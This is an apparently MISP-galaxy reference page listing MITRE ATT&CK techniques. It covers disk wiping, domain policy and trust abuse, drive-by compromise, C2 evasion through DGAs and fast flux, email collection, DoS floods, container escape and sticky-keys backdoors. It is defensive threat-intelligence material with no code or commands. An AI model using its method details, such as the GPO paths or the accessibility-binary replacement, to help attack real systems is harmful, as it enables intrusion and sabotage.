Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018] The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped.

On a network devices, adversaries may reformat the file system using Network Device CLI commands such as format.[format_cmd_cisco]

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017]

Internal MISP references

UUID 14a944d3-ab95-40d8-b069-ccc4824ef46d which can be used as unique global reference for Disk Structure Wipe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1561.002
Related clusters

To see the related clusters, click here.

Disk Wipe

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Novetta Blockbuster Destructive Malware]

On network devices, adversaries may wipe configuration files and other data from the device using Network Device CLI commands such as erase.[erase_cmd_cisco]

Internal MISP references

UUID ea2b3980-05fd-41a3-8ab9-3106e833c821 which can be used as unique global reference for Disk Wipe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Domain Trust Modification

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.[Microsoft - Azure AD Federation] These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge SAML Tokens, without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.[AADInternals zure AD Federated Domain]

Internal MISP references

UUID f534b0a6-4445-409a-889c-6c3ac34656f1 which can be used as unique global reference for Domain Trust Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1484.002
Related clusters

To see the related clusters, click here.

Group Policy Modification

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.[TechNet Group Policy Basics][ADSecurity GPO Persistence 2016]

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more.[ADSecurity GPO Persistence 2016][Wald0 Guide to GPOs][Harmj0y Abusing GPO Permissions][Mandiant M Trends 2016][Microsoft Hacking Team Breach] Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.[Wald0 Guide to GPOs]

For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.[Wald0 Guide to GPOs][Harmj0y Abusing GPO Permissions] In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.[Harmj0y SeEnableDelegationPrivilege Right]

Internal MISP references

UUID 7c9035b8-ad4b-4441-be2b-823d86b54fac which can be used as unique global reference for Group Policy Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1484.001
Related clusters

To see the related clusters, click here.

Domain Policy Modification

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious Scheduled Task to computers throughout the domain environment[ADSecurity GPO Persistence 2016][Wald0 Guide to GPOs][Harmj0y Abusing GPO Permissions] or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks] Adversaries can also change configuration settings within the AD environment to implement a Rogue Domain Controller.

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

Internal MISP references

UUID d092a9e1-63d0-415d-8cd0-666a261be5d9 which can be used as unique global reference for Domain Policy Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Domain Trust Discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.[Microsoft Trusts] Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting.[AdSecurity Forging Trust Tickets][Harmj0y Domain Trusts] Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.[Harmj0y Domain Trusts] The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.[Microsoft Operation Wilysupply]

Internal MISP references

UUID 93bd112e-9494-4b60-bdc5-8b610c7ebe21 which can be used as unique global reference for Domain Trust Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Drive-by Compromise

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.

Multiple ways of delivering exploit code to a browser exist (i.e., Drive-by Target), including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
  • Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
  • Malicious ads are paid for and served through legitimate ad providers (i.e., Malvertising)
  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.[Shadowserver Strategic Web Compromise]

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.
  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
  3. Upon finding a vulnerable version, exploit code is delivered to the browser.
  4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to Steal Application Access Tokens, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.[Volexity OceanLotus Nov 2017]

Internal MISP references

UUID d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381 which can be used as unique global reference for Drive-by Compromise in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

DNS Calculation

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.[Meyers Numbered Panda]

One implementation of DNS Calculation is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.[Meyers Numbered Panda][Moran 2014][Rapid7G20Espionage]

Internal MISP references

UUID e9cc000d-174e-4e6c-9513-a0c000061700 which can be used as unique global reference for DNS Calculation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1568.003
Related clusters

To see the related clusters, click here.

Domain Generation Algorithms

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.[Cybereason Dissecting DGAs][Cisco Umbrella DGA][Unit 42 DGA Feb 2019]

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.[Cybereason Dissecting DGAs][Cisco Umbrella DGA][Talos CCleanup 2017][Akamai DGA Mitigation]

Adversaries may use DGAs for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.[Talos CCleanup 2017][FireEye POSHSPY April 2017][ESET Sednit 2017 Activity]

Internal MISP references

UUID b0be2e07-e4b4-4f1a-8fce-c7a1e820a817 which can be used as unique global reference for Domain Generation Algorithms in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1568.002
Related clusters

To see the related clusters, click here.

Fast Flux DNS

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.[MehtaFastFluxPt1][MehtaFastFluxPt2][Fast Flux - Welivesecurity]

The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.[Fast Flux - Welivesecurity]

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.

Internal MISP references

UUID abae30c8-c6b0-46ae-b464-44b66412065f which can be used as unique global reference for Fast Flux DNS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1568.001
Related clusters

To see the related clusters, click here.

Dynamic Resolution

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.[Talos CCleanup 2017][FireEye POSHSPY April 2017][ESET Sednit 2017 Activity]

Internal MISP references

UUID 987ad3da-9423-4fe0-a52b-b931c0b8b95f which can be used as unique global reference for Dynamic Resolution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Email Forwarding Rule

Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.[US-CERT TA18-068A 2018] Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.[Pfammatter - Hidden Inbox Rules] Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.[Microsoft Tim McMichael Exchange Mail Forwarding 2][Mac Forwarding Rules]

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.[Pfammatter - Hidden Inbox Rules]

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.[Microsoft Mail Flow Rules 2023] Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.

Internal MISP references

UUID 59db734e-9edb-4c92-b2ca-a72fe1e08ac7 which can be used as unique global reference for Email Forwarding Rule in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1114.003
Related clusters

To see the related clusters, click here.

Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.[Outlook File Sizes] IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.[Microsoft Outlook Files]

Internal MISP references

UUID 9a388756-9de0-45ea-9820-810443733789 which can be used as unique global reference for Local Email Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1114.001
Related clusters

To see the related clusters, click here.

Remote Email Collection

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as MailSniper can be used to automate searches for specific keywords.

Internal MISP references

UUID 5de59320-1471-4715-99c4-eda2f7996d07 which can be used as unique global reference for Remote Email Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1114.002
Related clusters

To see the related clusters, click here.

Email Collection

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

Internal MISP references

UUID 3569b783-1be5-414b-adb9-42c47ceee1cc which can be used as unique global reference for Email Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Asymmetric Cryptography

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as Asymmetric Cryptography.

Internal MISP references

UUID ce822cce-f7f1-4753-bff1-12e5bef66d53 which can be used as unique global reference for Asymmetric Cryptography in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1573.002
Related clusters

To see the related clusters, click here.

Symmetric Cryptography

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

Internal MISP references

UUID ac7b9775-8323-49cb-8fef-3cef972f11ac which can be used as unique global reference for Symmetric Cryptography in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1573.001
Related clusters

To see the related clusters, click here.

Encrypted Channel

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

Internal MISP references

UUID 0e704680-c930-42a7-9caa-5802b8cb2c48 which can be used as unique global reference for Encrypted Channel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Application Exhaustion Flood

Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.[Arbor AnnualDoSreport Jan 2018]

Internal MISP references

UUID 49ef3482-7b75-4097-b9a6-6c9cb99d865c which can be used as unique global reference for Application Exhaustion Flood in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.003
Related clusters

To see the related clusters, click here.

Application or System Exploitation

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. [Sucuri BIND9 August 2015] Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.

Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as Data Destruction, Firmware Corruption, Service Stop etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.

Internal MISP references

UUID 2109de05-5b45-4519-94a2-6c04f7d88286 which can be used as unique global reference for Application or System Exploitation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.004
Related clusters

To see the related clusters, click here.

OS Exhaustion Flood

Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.[Arbor AnnualDoSreport Jan 2018] With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.[Cloudflare SynFlood]

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.[Corero SYN-ACKflood]

Internal MISP references

UUID b05b5092-60f8-4324-aee3-7522753439ac which can be used as unique global reference for OS Exhaustion Flood in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.001
Related clusters

To see the related clusters, click here.

Service Exhaustion Flood

Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.[Arbor AnnualDoSreport Jan 2018] Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.[Cloudflare HTTPflood]

Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.[Arbor SSLDoS April 2012]

Internal MISP references

UUID 03619027-8a54-4cb2-8f1d-38d476edbdd8 which can be used as unique global reference for Service Exhaustion Flood in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.002
Related clusters

To see the related clusters, click here.

Endpoint Denial of Service

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes[FireEye OpPoisonedHandover February 2016] and to support other malicious activities, including distraction[FSISAC FraudNetDoS September 2012], hacktivism, and extortion.[Symantec DDoS October 2014]

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.[USNYAG IranianBotnet March 2016]

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.[ArsTechnica Great Firewall of China]

For attacks attempting to saturate the providing network, see Network Denial of Service.

Internal MISP references

UUID 8b0caea0-602e-4117-8322-b125150f5c2a which can be used as unique global reference for Endpoint Denial of Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Escape to Host

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.[Docker Overview]

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as unshare and keyctl to escalate privileges and steal secrets.[Docker Bind Mounts][Trend Micro Privileged Container][Intezer Doki July 20][Container Escape][Crowdstrike Kubernetes Container Escape][Keyctl-unmask]

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as docker.sock, to break out of the container via a Container Administration Command.[Container Escape] Adversaries may also escape via Exploitation for Privilege Escalation, such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.[Windows Server Containers Are Open]

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.

Internal MISP references

UUID bebaf25b-9f50-4e3b-96cc-cc55c5765b61 which can be used as unique global reference for Escape to Host in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Accounts

Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.[Awake Security C2 Cloud]

Creating Cloud Accounts may also require adversaries to establish Email Accounts to register with the cloud provider.

Internal MISP references

UUID 4c7e52b1-9881-4966-b9b5-d88c5e88d604 which can be used as unique global reference for Cloud Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1585.003
Related clusters

To see the related clusters, click here.

Email Accounts

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing.[Mandiant APT1] Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains).[Mandiant APT1]

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.[Trend Micro R980 2016]

Internal MISP references

UUID 1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb which can be used as unique global reference for Email Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1585.002
Related clusters

To see the related clusters, click here.

Social Media Accounts

Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.[NEWSCASTER2014][BlackHatRobinSage]

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.[NEWSCASTER2014][BlackHatRobinSage] These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Internal MISP references

UUID fe0bf22c-efb2-4bc6-96d8-e0e909502fd7 which can be used as unique global reference for Social Media Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1585.001
Related clusters

To see the related clusters, click here.

Establish Accounts

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.[NEWSCASTER2014][BlackHatRobinSage]

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.[NEWSCASTER2014][BlackHatRobinSage]

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for Phishing for Information or Phishing.[Mandiant APT1]

Internal MISP references

UUID 9a2d6628-0dd7-4f25-a242-b752fcf47ff4 which can be used as unique global reference for Establish Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Accessibility Features

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. [FireEye Hikit Rootkit]

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). [DEFCON2016 Sticky Keys] The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

